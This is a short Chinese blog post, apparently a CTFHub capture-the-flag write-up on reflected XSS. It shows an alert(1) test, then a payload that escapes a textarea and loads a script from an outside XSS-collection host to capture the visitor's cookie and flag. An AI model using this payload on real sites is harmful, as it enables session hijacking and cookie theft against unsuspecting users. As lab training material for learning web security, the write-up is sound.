反射型XSS
一、寻找漏洞
在搜索框中随意输入字符,发现输入的字符直接出现在界面上。
然后输入特殊字符进行尝试
1 | <script>alert(1)</script> |
出现了弹窗,表明网页没有对用户的输入进行处理,直接输出到界面上。
XSS漏洞出现。
二、实施攻击
在第一个搜索框中输入下面构造的payload,并点击submit
1 | </textarea>'"><script src=http://xsscom.com//a0zR72></script> |
然后在网页源代码中查找到这个payload是完整的,同时submit点击之后,URL发生改变。
将改变后的URL在第二个搜索框中输入并send
此时XSS platform收到了报文,在cookies中发现了flag
cookie : flag=ctfhub{3efc235465db70e45070d143}
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Sigma!